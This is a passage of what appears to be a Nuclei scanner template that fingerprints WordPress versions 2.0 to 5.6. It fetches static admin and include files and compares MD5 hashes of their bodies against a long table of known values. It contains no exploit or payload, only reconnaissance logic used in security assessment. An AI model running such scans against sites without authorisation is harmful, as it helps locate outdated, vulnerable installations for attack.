"{{BaseURL}}/wp-admin/js/customize-nav-menus.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"ab9e3ae2d4e5b67fa155e62311987bea\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"62c76211a81251e495b11d23314da878\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"dc3b7e6bb1b67c77a8259d19df7eb7b1\" == md5(body))" - - type: dsl - name: 4.7.3 - dsl: - - "(\"f09d815335cd77c8c7777b2824254c07\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"9b6fd3900a2dd88c4de0e4655f362cb3\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"444b2358c6ad5e0be84b367b2e080a0f\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"8984e47a6836e5b0fdb5e89049bb8084\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"852fe74d1ce464ec9e621e10e52428e8\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"47e3575662370328eff294a91679a15f\" == md5(body))" - - type: dsl - name: 4.3.2 - 4.3.25 - dsl: - - "(\"b06763f8894176006633b67282d417ab\" == md5(body))" - - type: dsl - name: 4.3.1 - dsl: - - "(\"12a53b2080fee745c366799d75f36e49\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"eb8b822276e2dbfbc687a78ad65253dc\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"abeadaf293f7a753b3f000b21513fbbd\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"b398320f5969c1c95bbf52ef6edf95ec\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"761a86bbff4239fc775162efb53fb2fb\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"dab7c6fe47ffeebdd90036c2615fe84f\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"3eeb230682665e3b3f0ec4752747c176\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"aff331bc7e43fdefe81544ce420ce9b3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a6ffef157a167b4fdf103bbd0418711e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"46fe96ba671876ce0808b48f733e19c4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/editor.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"52984e805a29165946383973e8551d5b\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.19 - dsl: - - "(\"76dd539631f379ca702e9757f52a53f3\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"7d9001aa245e6004270b0389a945df88\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"ba5d55100eab7af70a53164d5f2653b7\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"b8e891a43bc75441f6fbcec79f8c4793\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"3b39195b45bf3dfd8fd9f1a0b0b70c3c\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"cad7dada660b400f74333b7c98413dd4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"1e33af23a168b21a333bf6ba71ac4671\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"d0af21973275bb0564f8d1525e0d325e\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a7a6f1bc16e1f5c9bdd1b08d95151d11\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"1c23a8dfcb49c96745ab5a40854041ec\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"952c6da3495a55b489c237b8552fd666\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"8d7e42146c845324eb5781a7a985dee0\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"c8d76423399c96a70dedb4fb51435fc8\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"bb72ad210956d7f1e6889dd89fea310f\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7d816fc5436c48453c18a5b14be80f3a\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"850b8a19ced6f9abaff2d890cae5611e\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"94db0977de867d05ca85e61a43580bbd\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"fe28c98656cdf515c7c6aa9de76da805\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"60f588936c53c1a1c4e545dd806a522f\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"40f8ea7fd6fe99ea9ebf66ae9af50166\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"151b124e7cdd860734a5258c5b38abb4\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"b7c4a02b55be88d7bd743618b473a7ec\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"e46522d1a0b234fb177f8b328120fbe2\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"2a63ff20dac8b1a01f68f8874e4e3de5\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"4ec7288450a487a7c228d7e09a25dba6\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"62fceaa11574bf917cbfaed196374da7\" == md5(body))" - - type: dsl - name: 4.9.2 - dsl: - - "(\"ed089860adc11ffbace721ab647297d1\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.0.11 - dsl: - - "(\"e086a26a0c57fde0e82d1b600b6b8df9\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"f34b196dd1411f3ab1cd1b9f284f02d5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"84801b81cf2cc9b89a0523225beaa6e0\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"335282bb7efb5b07951afe0a0639d66b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/rtl.css" - matchers: - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"abc1ae8e44b7b7820714416b155b9400\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"395db168cd1238d99584184ead0b324e\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"545758c52dbfa268fbebcf30daff4b4e\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"cf6bb826f170ceacd93cd4cb2cfd4661\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"2768e4099588e3689883dd201bd130d2\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"ec098e76667af2ccd9a02f31f02fe270\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"a805b001e7833d4e798ce5e53de34695\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"c3316d03e21caf854e9a27df34025d0a\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"27166e3aa9fddf13dacef61f3154b99e\" == md5(body))" - - type: dsl - name: 2.2.3 - dsl: - - "(\"26fb3af4670b564efdefbf845d84266b\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.2 - dsl: - - "(\"ae64aa5c96bfecff5fda7ba51221c20b\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"94385d725a8f9a6292ed4ef9856b2d24\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-fresh.css" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"c4b004c430b5ef1d2bacd01b098e4a60\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"ddf28ae11a49d546f52237a16604d024\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"378399e10bdc7cd9a25e8e80e909a545\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"501b29f8b4acb2f1209a2c69c97f9435\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"85f468b9ada7919c4a9b4411eaf19741\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"8f7250aa912e64836b464e870274f8c3\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"a4f330ffa223e2629ea55241d5e7528f\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"7103571c7f13000d5f8a5b3e335455c8\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"3fc8fe3072cf16bc8a1ea98214e2cebc\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"04f64d74b428649848955844036812f2\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"cda9416899dddadf313394ebd43cc7e1\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"6e38d42a1ea70cb8d6977d56f1540ae3\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"1a6661c026e5cc2c5d837e337cfdddb4\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"6a9084969aab96f036b52d4f65ec1e92\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"6938abcd3a8afa6d7d1b93926844d9e3\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"18eaf0c9ea22cdb88360c02c21a38ccb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-classic.css" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"ee29aa2dc15802e0907872be559c742f\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"84d9192954ff85e1445661888b510fdf\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"65e90510014f31acfc60ce2726d0ef7d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"312a02c212d05b8bf10080e2508f5ead\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"ebd741391596236221825c0a4de55904\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"d58169f2b111dafc6c3b049e4ef05a48\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"3efef5c8bcce187e8b46d86f8511121e\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"d726c149e469fc93bd0454666f9d13cd\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"9bd9e568b7630f726ea50c1e5b37b8e0\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"4f0524bd41bf91793c2eab07e8737b24\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"58fb10cc748dd1cde88c24f07ab0e301\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"53f33ed31f23389799301fec86458c06\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"01bf077a9bb28e93c4596ee0063eab83\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"587111ae171780cc7f8dd4ab5bc31818\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"28f5840cdab148f66e3c93ca047fc6d2\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"50ecea581a41faceafa8e3af5116545a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"acb33329b9ef8aabd8bd731426803e4e\" == md5(body))" - - type: dsl - name: 3.5.2 - 3.6.1 - dsl: - - "(\"eddb5fda74d41dbdac018167536d8d53\" == md5(body))" - - type: dsl - name: 3.5.1 - dsl: - - "(\"6e79ab6d786c5c95920064add33ee599\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"55cd8e5ceca9c1763b1401164d70df50\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7424043e0838819af942d2fc530e8469\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"9754385dabfc67c8b6d49ad4acba25c3\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"a57c0d7464527bc07b34d675d4bf0159\" == md5(body))" - - type: dsl - name: 3.1.1 - 3.1.4 - dsl: - - "(\"e52dfe5056683d653536324fee39ca08\" == md5(body))" - - type: dsl - name: 3.1 - dsl: - - "(\"82ac611e3da57fa3e9973c37491486ee\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"128e75ed19d49a94a771586bf83265ec\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"56c606da29ea9b8f8d823eeab8038ee8\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"e6bbc53a727f3af003af272fd229b0b2\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"61740709537bd19fb6e03b7e11eb8812\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"a3d05665b236944c590493e20860bcdb\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"7293453cf0ff5a9a4cfe8cebd5b5a71a\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"83c83d0f0a71bd57c320d93e59991c53\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"25e1e78d5b0c221e98e14c6e8c62084f\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"4f04728cb4631a553c4266c14b9846aa\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"a306a72ce0f250e5f67132dc6bcb2ccb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"6c4a056298234e78dfef399226863d0a\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"670d07b379f5bfad08e0625eec4699bc\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"b7b29f888d25ff3fcc0471650d6c1ed3\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3dc984331b01fcfa8d5ec942fa749f38\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"618e785cabef127b6f305551af39194e\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"636d3786cc0a809009380c1b8040e9e1\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"a41175ed3524292e4d29dc11e2486308\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"dca19314e2e3871f91e07bcf64b23e53\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"fd425da3ec4295915254f73403f78d03\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"3edd89cf250ff41992e4aba77c41c195\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"8c7fbc1f9ffd7a9a292b6ae288f1b002\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"8eb485b1fdd4cb0300cb96802908ecc7\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"17ac5e39ad81e92d93b7554a36c276d1\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"0754c40a9f47a4e08e88d057cc185bfd\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"fb5beaa57223ab3cd864e925731bf76f\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"75f1c7eb78821ece2fcf5b7805854488\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"64bab9b4abfb8c4ec53c66d5d2e2df2c\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"0eb6e751aeb328f04eb683731b905ce3\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"ed438902b0622173a5f39650a19c6060\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/wp-admin.css" - matchers: - - type: dsl - name: 4.3 - 5.1.8 - dsl: - - "(\"bfe4bd90350018abc7c9210bfb9d2a5b\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"ada11abbeb8553e9524605cbfc29d26d\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"ff37a40c48d23ba4ecc09d9a98da1247\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"68600417d5dc22244168b4eeb84f0af4\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"25554fc81989c307119b7d4818dc3963\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"f0894fa9c9733d0e577fc5beddc726cd\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"25dd20710bf1eec392a00fc892b63fde\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"1906ac1bed40e0c5c7de71f2bc42dc20\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"c8c02c7d0318ddeb985e324f126a19e8\" == md5(body))" - - type: dsl - name: 3.4.1 - 3.4.2 - dsl: - - "(\"dc906af62607ada3fe2baac62ac3cceb\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"d8471b68d45739f07aac407c06fb8903\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"83cf78172b0d46d6a808abf644ed118f\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"a8a5bdf7cb06970dcd1de76dd2f59622\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"0beaaab72e767baed9fabade0b758090\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"9083913dd3999956e49ae0be1cda8db4\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"481dbfb239988dd269ae98e46db408bd\" == md5(body))" - - type: dsl - name: 5.2 - 5.6 - dsl: - - "(\"96372351aa264d3fc2bb87f97c1ff35b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/editor.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"a22a4909a6b06c17cf62b1977c388e54\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"cf85c9080df7d2d8c27e19e740703c0c\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"6191d588e62256e25a4e735c318b5ab0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d967380a92f98ed2212fe0e433683fd1\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"515272579d154fde40423b78df09eafd\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"45d6407af8df11f4c30ca0771f6f8f1e\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"1541bad21f42a3954d3c9a599d83da7f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"dcc370abb06f10a49b52d1a8ba3ff99e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"2bc7e4b19253eed1e53593a20b24d59a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"adc52d3dcd042be5ae8fee1275c9fba6\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"73fe74163067205c6d4a33d79afb49f0\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"f5c99de8447a3effc6ef7ca3b8b753a3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/editor.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"0b7a60f594a855e0e26b2f2ec9e69735\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"c87633f8da294feb9c73aacfbfec6445\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"dc9f3b6295f11d544425284077dbe77f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"75cebda3459f61e6d658988be586a6cd\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"51e011a46e2657f9aa80056e9839d5d1\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"05019309afe8ba2eaef54135e1b28f3a\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"ab5e2269551288bd648c259ce2d3e1be\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"60bfecc5cd647b68e7e6031fa539422c\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c6bb12fac52da543dc8bb9b23952c4b9\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"639720f115ef90063f1322115a1d5cd5\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"175c53174f9113c448f919cbccae40d3\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"cb1ca79169dcde958fb4e44d8d04a5fa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/block-library.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"291bd8b45040401f3a8897c828406b9a\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"74357886d827e1f853efdd226b79f78d\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.4 - dsl: - - "(\"f8dd79f25b1b88b0dac790416138a00a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.1 - dsl: - - "(\"f8852dc27fc72a22978f69c48fc9eda0\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d89c10f1291f8a91b7fc792102e9a50f\" == md5(body))" - - type: dsl - name: 5.1.2 - 5.1.8 - dsl: - - "(\"5797071c93968c42fa3e3273f845dde1\" == md5(body))" - - type: dsl - name: 5.0.6 - 5.0.11 - dsl: - - "(\"0ae164e7a41074a26c6cb3269dc315bb\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"630d0a20ef044b004db95a590b16e539\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"5786c85790791cef4476254b70a3e310\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"77f4bee1b57b7a2e8c7a3a00472fbd93\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"76a8f66f1baf61530ba29a6e63646d14\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"427db941f1aabc7a9e5ea0e422ecbe61\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"18a4cc9108b119dae32fa49b1cf721d5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"072ef14ff62aedc7478e43e8da64965d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/block-library.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"1d2c405b92e99c5e00853b228f850320\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"c56e6de4eae3228b22d00c3724679a89\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.4 - dsl: - - "(\"3d87ea3fd4d155e3f8d0e1e96cea6256\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.1 - dsl: - - "(\"4521e9e5c60e1b4423ba6fbb131ddc5c\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"98bde7733f06287852aecf081701fd15\" == md5(body))" - - type: dsl - name: 5.1.2 - 5.1.8 - dsl: - - "(\"94a6cbc830b4626b54a58c3834aa3fd3\" == md5(body))" - - type: dsl - name: 5.0.6 - 5.0.11 - dsl: - - "(\"a0c292f486ed240d8dd94b46926dc09a\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"f02452393cdd7a8b29709778a74ca06e\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"27a78ec28594f9c11c1a5b2a58783ce0\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"4c4aa2ca24ecf50d440b387de1abd66a\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"83e96c1857cf0f48a0977c3f1945ec58\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"4d608fe3d1e2749c4cdb25ab202454ec\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"41822c26ae5c3152c62d680acb4348d6\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c5df24c1fff24d23a6e67dbc28c116de\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/comment-reply.js" - matchers: - - type: dsl - name: 4.4 - 4.8.15 - dsl: - - "(\"14eac74ea4d8aeca08e8ef8d54d42600\" == md5(body))" - - type: dsl - name: 3.8 - 4.3.25 - dsl: - - "(\"d30ad028653d4eac285a1d4d06567bbd\" == md5(body))" - - type: dsl - name: 2.7 - 3.7.35 - dsl: - - "(\"20ef5771571f1be483869066b2830c2f\" == md5(body))" - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"500ceaa723d95be311592bd902d6823e\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"01183853cffabcfc771e87e405727059\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"52a6c4d3a6cefff47b79c30db7d8ee7a\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.2.9 - dsl: - - "(\"34b2e8e0aa667614a0d5f5a51c495523\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"bde01a471cbd94556bde642fb5d9a47e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f64b977554cb703fea652f071f860569\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"b83efaf9c4e6691f4cede5576faea864\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"fec112ee4ed2c2b98379542caf62fdf8\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"7db11622caac3bac91fc306b3a31387d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"0cc71f461782b4934436aeffecc878ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/components.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"7c27168f0230a5cb5a821dea4546ca81\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"e62b5f92035e2e50e0586f759514591c\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"84cdfb957f060ba494e4a5178672c106\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6ffc4c427d77a88a1b5cfac3d17cbf47\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"11fe173edfba0532a0a8cf7bd5a205f5\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"663eaffbf181f29735fceeb3c3f97689\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b4f0eb3ad608b4c8e8ee6ba6015bb09a\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"c10f5b9306bb3404b640af730e312d35\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"bd3a91716306fed014aee273763ad179\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"8bd21b96c00552743be00093a557eb02\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3b895f6f07a0d2086b5dbbe22ffb0f62\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/components.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"08c30574c8edf2379c68a601d8b7ee8a\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"0de0e022a32a1fc83bcab47595434875\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"51965929307297ed0ef5e9ad07709dfa\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2f62353fb94912550c115db169918e40\" == md5(body))" - - 